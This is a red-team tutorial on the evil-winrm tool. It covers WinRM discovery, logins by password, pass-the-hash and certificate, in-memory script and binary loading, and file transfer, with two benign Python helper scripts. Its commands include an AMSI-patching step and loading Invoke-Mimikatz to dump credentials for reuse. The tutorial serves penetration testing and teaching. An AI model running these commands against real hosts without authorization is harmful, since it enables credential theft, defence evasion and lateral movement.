
Title: Red Team Artifact-Evil-Winrm Detailed Guide


Foreword

Evil-winrm

The tool was originally developed by the Hackplayers team. Its purpose is to make penetration testing as simple as possible, especially in Microsoft Windows environments.

Evil-winrm uses the PowerShell Remoting Protocol (PSRP) on top of Windows Remote Management (WinRM), the remote management protocol that system and network administrators commonly use. WinRM is a firewall-friendly SOAP protocol carried over HTTP; by default it listens on TCP port 5985 for HTTP and 5986 for HTTPS. For more information about PowerShell remoting, see the official Microsoft documentation:

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3

Introduction to Evil-winrm

Evil-winrm is an open source tool written in Ruby. It has many useful features, including login with a plaintext password, login over SSL/TLS, login with an NTLM hash (pass-the-hash), certificate (key) login, file transfer, session logging and more. The author keeps the tool actively updated and has maintained it for a long time. With evil-winrm we get a PowerShell command session on the remote host. The tool ships with Kali Linux, but if you want to install it separately you can get it from its official git repository.

Download link: https://github.com/Hackplayers/evil-winrm

Winrm Service Discovery

As mentioned above, if the WinRM service is enabled on the remote host we can use the evil-winrm tool against it. To confirm whether the target has WinRM enabled, we use nmap to check whether the two default WinRM ports, 5985 (HTTP) and 5986 (HTTPS), are open. The scan below shows that the WinRM service is enabled, so we can use evil-winrm to log in and perform the other tasks we will explore in the lateral movement phase. Keep in mind that an open port only proves that something is listening; it does not by itself prove that the listener speaks WS-Management or which authentication methods it accepts.

nmap -p 5985,5986 192.168.1.19

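A port scan cannot tell WinRM apart from any other HTTP listener on 5985. The following script is an added example for this guide (not code from the original post or from evil-winrm) that sends the WS-Management Identify request, which WinRM answers without credentials when the WSMANIDENTIFY header is present, and then reads the authentication schemes the service advertises in its 401 reply. The /wsman path and the WSMANIDENTIFY header are WinRM's defaults; SAMPLE_IDENTIFY is a constructed copy of what a Windows host returns, and the live probe only runs when a host is given on the command line.

```python
"""Confirm that an open 5985/5986 is really WinRM, not just some HTTP listener.

Added example for this guide; it is not code from the original post or from
evil-winrm. It sends the WS-Management Identify request, which WinRM answers
without credentials when the 'WSMANIDENTIFY: unauthenticated' header is set,
and reads the authentication schemes the service offers in its 401 reply.
SAMPLE_IDENTIFY is a constructed copy of what a Windows host returns; the
live probe runs only when a host is given on the command line.
"""
import http.client
import ssl
import sys
import xml.etree.ElementTree as ET

SOAP = "http://www.w3.org/2003/05/soap-envelope"
WSMID = "http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"

IDENTIFY_REQUEST = (
    f'<s:Envelope xmlns:s="{SOAP}" xmlns:wsmid="{WSMID}">'
    "<s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>"
)

# Constructed sample of WinRM's unauthenticated IdentifyResponse.
SAMPLE_IDENTIFY = (
    f'<s:Envelope xmlns:s="{SOAP}" xmlns:wsmid="{WSMID}"><s:Header/><s:Body>'
    "<wsmid:IdentifyResponse>"
    "<wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion>"
    "<wsmid:ProductVendor>Microsoft Corporation</wsmid:ProductVendor>"
    "<wsmid:ProductVersion>OS: 0.0.0 SP: 0.0 Stack: 3.0</wsmid:ProductVersion>"
    "</wsmid:IdentifyResponse></s:Body></s:Envelope>"
).encode()


def parse_identify(body: bytes) -> dict:
    """Pull vendor, version and protocol out of an IdentifyResponse body."""
    root = ET.fromstring(body)
    info = {}
    for tag in ("ProductVendor", "ProductVersion", "ProtocolVersion"):
        el = root.find(f".//{{{WSMID}}}{tag}")
        info[tag] = el.text.strip() if el is not None and el.text else None
    return info


def is_winrm(info: dict) -> bool:
    """WinRM reports Microsoft as vendor and an 'OS: ... Stack: ...' version string."""
    return (info.get("ProductVendor") == "Microsoft Corporation"
            and (info.get("ProductVersion") or "").startswith("OS:"))


def auth_schemes(www_authenticate: list) -> list:
    """Scheme names from WWW-Authenticate values, e.g. ['Negotiate', 'Basic']."""
    schemes = []
    for value in www_authenticate:
        for part in value.split(","):
            name = part.strip().split(" ")[0]
            if name and name not in schemes:
                schemes.append(name)
    return schemes


def probe(host: str, port: int = 5985, use_tls: bool = False, timeout: float = 5.0) -> dict:
    """Live probe: Identify first, then a bare POST to collect the 401 auth schemes."""
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE  # WinRM HTTPS listeners are usually self-signed
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    soap = {"Content-Type": "application/soap+xml;charset=UTF-8"}
    conn.request("POST", "/wsman", body=IDENTIFY_REQUEST,
                 headers={**soap, "WSMANIDENTIFY": "unauthenticated"})
    resp = conn.getresponse()
    body = resp.read()
    result = {"status": resp.status, "identify": None, "auth": []}
    if resp.status == 200:
        result["identify"] = parse_identify(body)
    # Without the identify header WinRM answers 401 and lists what it accepts.
    conn.request("POST", "/wsman", body=IDENTIFY_REQUEST, headers=soap)
    resp = conn.getresponse()
    resp.read()
    result["auth"] = auth_schemes(resp.headers.get_all("WWW-Authenticate") or [])
    conn.close()
    return result


if __name__ == "__main__":
    if len(sys.argv) < 2:
        info = parse_identify(SAMPLE_IDENTIFY)
        print("sample response looks like WinRM:", is_winrm(info), info)
    else:
        tls = len(sys.argv) > 2 and sys.argv[2] == "-S"
        print(probe(sys.argv[1], 5986 if tls else 5985, tls))
```

Run it as `python3 winrm_identify.py 192.168.1.19` (add `-S` to probe the HTTPS listener). A vendor of "Microsoft Corporation" with the "OS: 0.0.0 SP: 0.0 Stack: 3.0" placeholder version is the unauthenticated WinRM signature; the scheme list tells you whether Negotiate (what evil-winrm uses for password and hash logins) is offered, and whether Basic is also enabled on the listener.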

Evil-winrm help command help

To list all available features of evil-winrm, we simply use the -h flag, which prints every option with a description.

evil-winrm -h

Login with a plain text password

Suppose we obtained a plaintext password during the account enumeration phase and noticed that the remote host has WinRM enabled. We can use evil-winrm to open a remote session on the target, passing the target IP address with -i, the username with -u and the password with -p. As shown in the figure below, a remote PowerShell session has been established. Note that WinRM only grants a session to accounts that belong to the local Administrators group or the Remote Management Users group on the target; a valid password for any other user is not enough on its own.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

Login with a plain text password - Enable SSL

As mentioned above, the WinRM service can carry its traffic over plain HTTP, and we can instead use the SSL/TLS listener so that the transport itself is encrypted. Once SSL is enabled our traffic travels over HTTPS, which by default means port 5986 rather than 5985; with -S evil-winrm defaults to 5986, and -P overrides the port if the HTTPS listener is elsewhere. With evil-winrm we add the -S parameter to establish the session over the encrypted transport. Keep in mind that even without -S the SOAP payload is still wrapped in WinRM's Negotiate/NTLM message-level encryption unless the target has AllowUnencrypted enabled; -S adds TLS on top of that, and a defender watching the wire then sees only TLS on 5986 instead of NTLM-authenticated HTTP on 5985.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

Login with NTLM Hash - Pass the hash

In any intranet penetration test, and in particular in projects involving Windows privilege escalation and Active Directory exploitation, we often obtain NTLM hashes through various attack methods. In a Windows intranet environment we can use evil-winrm to open a PowerShell session by performing a pass-the-hash attack, using the NT hash in place of the plaintext password for the remote login. The same hash can also be reused with other tools and protocols that support pass-the-hash. With evil-winrm the hash is supplied with the -H parameter. Note that -H takes only the NT hash; if a credential dumper gives you the LM:NT form, drop the LM part before the colon.

evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

Load Powershell script

Evil-winrm also lets us use PowerShell scripts stored on our own attacking machine. With the -s parameter we give the local directory that holds the scripts; a script is then loaded directly into the memory of the remote session by typing its name. The tool also provides the Bypass-4MSI command in its menu, which attempts to patch AMSI in the session and is usually needed before importing any script. In the following example we run Bypass-4MSI, load Invoke-Mimikatz.ps1 from our local scripts directory into the target's memory, and then run the Invoke-Mimikatz command. For demonstration purposes we dump the cached logon credentials; afterwards we can use the obtained NTLM hash for another pass-the-hash attack. Be aware that this Invoke-Mimikatz script is old and heavily signatured, so on a current Defender build Bypass-4MSI alone may not be enough to get it past AMSI.

https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell

Bypass-4MSI

Invoke-Mimikatz.ps1

Invoke-Mimikatz

Storing logs using Evil-winrm

This feature saves a log of the commands executed in the remote session to our local system. During an engagement we need a record of what was run and what came back for later reporting. All session logs are saved to our host with the -l parameter, in the /root/evil-winrm-logs directory by default. In the following example we run the ipconfig command in the session and its output is written to the log on the host system.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l

We can verify that the log was stored by checking the saved file; the output of the command above is recorded there.

Disable remote full path function

By default the tool enables remote path completion (tab completion of paths on the target). If we want to disable it, we add the -N parameter to the command. Whether to keep it on is a matter of preference; if you are happy with the automatic path completion, simply use the default behaviour.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N

Disable color interface

Whenever we open a remote session with evil-winrm, a colourised command line interface is produced. If we want to disable the colours, we use the -n parameter when creating the session (lower case; the upper case -N is the path completion switch above).

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -n

Run the executable file

This feature addresses a practical problem we run into during assessments: inside a PowerShell session there are tools we cannot simply run from the command line. In such a case we want to be able to run an .exe inside the evil-winrm session. Suppose we have an executable that we want to run on the target system.

The Hackplayers team added a feature to run executables from within an evil-winrm PowerShell session. With the -e parameter we give the local directory that contains the binaries; they are then executed with the Invoke-Binary command from the evil-winrm menu, which loads the file into memory on the target. In the following example, winPEASx64.exe is stored in /opt/privsc on our local machine and is run through Invoke-Binary. Note that Invoke-Binary loads the executable as a .NET assembly, so it only works with binaries compiled from C# (winPEAS is one); a native C/C++ executable has to be uploaded and run the usual way.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc

Bypass-4MSI

menu

Invoke-Binary /opt/privsc/winPEASx64.exe

Once the executable path has been set, we can run any suitable executable from that directory on the target system. In the example above we invoke winPEASx64.exe and it runs on the target through evil-winrm.
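Because Invoke-Binary only handles .NET assemblies, it is worth checking a binary before copying it into the -e directory. The following script is an added example for this guide (not code from the original post or from evil-winrm) that parses the PE headers and reports whether the CLR Runtime Header data directory is populated, which is what marks a managed executable. build_sample_pe() constructs header-only PE images for an offline demonstration; they are not runnable executables.

```python
"""Check whether an executable is a .NET assembly before giving it to Invoke-Binary.

Added example for this guide; it is not code from the original post or from
evil-winrm. Invoke-Binary loads the file through .NET reflection, so a native
PE (a C or C++ build) will not run through it. The check reads the PE optional
header and tests whether the CLR Runtime Header data directory (index 14) is
populated. build_sample_pe() constructs a header-only PE for offline use; it
is not a runnable executable.
"""
import struct
import sys

PE32, PE32PLUS = 0x10B, 0x20B
CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def is_dotnet_assembly(data: bytes) -> bool:
    """True if the PE carries a CLR header, i.e. it was compiled for .NET."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 24  # optional header follows the 4-byte signature and 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32:
        count_off, dir_off = opt + 92, opt + 96
    elif magic == PE32PLUS:
        count_off, dir_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    n_dirs = struct.unpack_from("<I", data, count_off)[0]
    if n_dirs <= CLR_DIRECTORY_INDEX:
        return False  # no CLR directory entry at all: native image
    va, size = struct.unpack_from("<II", data, dir_off + CLR_DIRECTORY_INDEX * 8)
    return va != 0 and size != 0


def build_sample_pe(dotnet: bool, pe32plus: bool = True) -> bytes:
    """Constructed header-only PE with just enough structure for the check above."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    fixed = 112 if pe32plus else 96  # optional header bytes before the data directories
    dirs = [(0, 0)] * 16
    if dotnet:
        dirs[CLR_DIRECTORY_INDEX] = (0x2008, 0x48)  # sizeof(IMAGE_COR20_HEADER) == 0x48
    opt = struct.pack("<H", PE32PLUS if pe32plus else PE32) + b"\0" * (fixed - 6)
    opt += struct.pack("<I", len(dirs))  # NumberOfRvaAndSizes
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 1, 0, 0, 0, len(opt), 0x22)
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            managed = is_dotnet_assembly(fh.read())
        print(sys.argv[1] + ":", ".NET assembly, Invoke-Binary can load it" if managed
              else "native PE, upload it and run it directly instead")
    else:
        print("constructed .NET sample:", is_dotnet_assembly(build_sample_pe(True)))
        print("constructed native sample:", is_dotnet_assembly(build_sample_pe(False)))
```

Run it as `python3 is_dotnet.py /opt/privsc/winPEASx64.exe` before adding a binary to the -e directory; a native result means the file belongs in the upload workflow described below rather than in Invoke-Binary.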

Use Evil-winrm for service query

Sometimes post-exploitation tools cannot find the names of the services running on the target system. In this case we can use evil-winrm for this: open the menu again and use the services entry, which lists all the services on the host.

File transfer using Evil-winrm

Evil-winrm does its best to keep our work simple. We constantly need to move files from the attacking machine to the remote host in order to run our tools there. The tool provides a very practical upload/download feature that carries the file through the existing WinRM session itself, so it works even when the target has outbound traffic rules that block a callback to our machine, or when we are running evil-winrm through a proxy. In the following example we upload the notes.txt file from the /root directory to the target system with the upload command, which takes the local path followed by the destination path on the target.

To pull a file from the target back to the attacker's machine we use the download command in the same way, with the remote path followed by the local destination:

download notes.txt /root/raj/notes.txt

Using Evil-winrm from Docker

This tool can also be run from Docker. If we have evil-winrm as a Docker image, we can call it from the container and it behaves just as it does on the host system. To do so, follow the docker syntax and append the normal evil-winrm command line:

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

Login with Evil-winrm key

Evil-winrm also lets us establish a remote session with a certificate and private key instead of a password: the private key is given with -k and the public certificate with -c. Certificate authentication in WinRM is only available on the HTTPS listener, so -S is required here, and the target must have the client certificate mapped to a local account for the login to succeed.

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S
